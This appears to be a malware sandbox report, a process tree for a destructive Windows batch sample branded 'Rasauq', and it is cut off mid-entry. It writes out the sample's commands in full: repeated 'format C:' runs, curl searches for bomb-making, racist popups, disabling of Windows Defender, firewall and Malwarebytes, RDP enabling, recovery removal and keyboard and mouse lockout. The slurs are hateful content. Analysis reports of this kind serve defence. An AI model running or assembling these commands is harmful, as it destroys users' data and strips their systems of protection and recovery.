      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3608
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1960
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5148
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4048
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1008
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2776
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2004
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3696
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3312
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5360
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4440
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:1960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4044
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1676
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1008
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3628
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4928
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2472
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5908
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4264
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4280
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2408
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2324
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3464
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4200
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:980
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6056
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1908
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2664
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5668
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5096
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2084
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4044
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2848
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:2372
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5992
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:2028
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5100
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5176
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5692
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:3480
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:1676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:5212
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3696
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4984
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2004
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4264
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5212
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2508
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3636
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4912
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:5460
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5864
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:2848
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3480
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1556
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5460
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5864
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5788
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5992
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6252
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6460
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6516
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6684
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6700
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6728
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6736
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:7072
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6268
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6352
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6400
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6504
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6496
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6516
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6544
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6580
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6804
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3812
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:1932
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2712
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6348
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6368
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6444
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3216
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6340
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6324
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6796
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4984
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4484
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6248
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6328
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6392
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6512
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6280
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6492
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6796
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6360
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6500
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:6252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3016
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7036
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7020
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6708
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6768
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6860
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:6196
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:6500
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:6876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:488
  - - C:\Windows\system32\openfiles.exe
      openfiles
      4⤵
      PID:2740
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(new-object -com shell.application).minimizeall()"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1960
  - - C:\Windows\system32\curl.exe
      curl -O https://media.discordapp.net/attachments/1198940919777472532/1349364239487467550/IMG_3728.png
      4⤵
      PID:3052
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "Wallpaper" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      Sets desktop wallpaper using registry
      PID:4260
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "WallpaperStyle" /t REG_SZ /d 10 /f
      4⤵
      PID:3852
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "TileWallpaper" /t REG_SZ /d 0 /f
      4⤵
      PID:4272
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "LockScreenImage" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:4648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "OEMBackground" /t REG_DWORD /d 1 /f
      4⤵
      PID:1008
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "BackgroundType" /t REG_DWORD /d 0 /f
      4⤵
      PID:544
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background" /v "Background" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\IMG_3728.png" /f
      4⤵
      PID:5324
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM" /v "AccentColor" /t REG_DWORD /d 0x00000000 /f
      4⤵
      PID:5596
  - - C:\Windows\system32\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:4032
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:5516
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mouhid" /v Start /t REG_DWORD /d 4 /f
      4⤵
      PID:1712
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /tn "Windows Host Service" /tr "\"C:\Windows\System32\Rasauq\$77RasauqBroker.bat\"" /sc onlogon /rl highest /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1252
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:5752
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start=disabled
      4⤵
      Launches sc.exe
      PID:2832
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:3712
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:1436
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:5544
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:5612
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:1888
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:6128
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows Defender" /v "Last Known Good" /t REG_DWORD /d 0 /f
      4⤵
      PID:3700
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v "DisableSecurityCenter" /t REG_DWORD /d 1 /f
      4⤵
      PID:4128
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SYSTEM\CurrentControlSet\Services\MpsSvc" /v "Start" /t REG_DWORD /d 4 /f
      4⤵
      Modifies security service
      PID:3768
  - - C:\Windows\system32\cmd.exe
      cmd /c "C:\Windows\System32\Rasauq\$77RasauqBroker.bat"
      4⤵
      PID:4028
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
        5⤵
        
        PID:3092
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2364
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object -ComObject SAPI.SpVoice).Volume = 100"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1696
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      4⤵
      PID:5580
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoViewContextMenu" /t REG_DWORD /d 1 /f
      4⤵
      PID:4844
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
      4⤵
      PID:3876
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f
      4⤵
      PID:4692
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
      4⤵
      PID:2380
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f
      4⤵
      PID:5948
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f
      4⤵
      PID:2320
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:5208
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f
      4⤵
      PID:5180
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f
      4⤵
      PID:688
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in Windows directory
      PID:1972
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5728
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1520
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Recovery /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4460
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3860
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {current} recoveryenabled No
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3600
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /deletevalue {default} recoveryenabled
      4⤵
      Modifies boot configuration data using bcdedit
      PID:396
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f
      4⤵
      PID:2236
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      PID:5908
  - - C:\Windows\system32\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:1352
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:4012
  - - C:\Windows\system32\reg.exe
      REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:3864
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:4104
  - - C:\Windows\system32\sc.exe
      sc config WinDefend start= disabled
      4⤵
      Launches sc.exe
      PID:2324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableAntiTamper $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1444
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4920
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2740
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1108
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbam.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4628
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MBAMService.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2256
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamtray.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4168
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM mbamscheduler.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4100
  - - C:\Windows\system32\sc.exe
      sc stop MBAMService
      4⤵
      Launches sc.exe
      PID:4520
  - - C:\Windows\system32\sc.exe
      sc delete MBAMService
      4⤵
      Launches sc.exe
      PID:1704
  - - C:\Windows\system32\sc.exe
      sc stop MBAMProtector
      4⤵
      Launches sc.exe
      PID:2280
  - - C:\Windows\system32\sc.exe
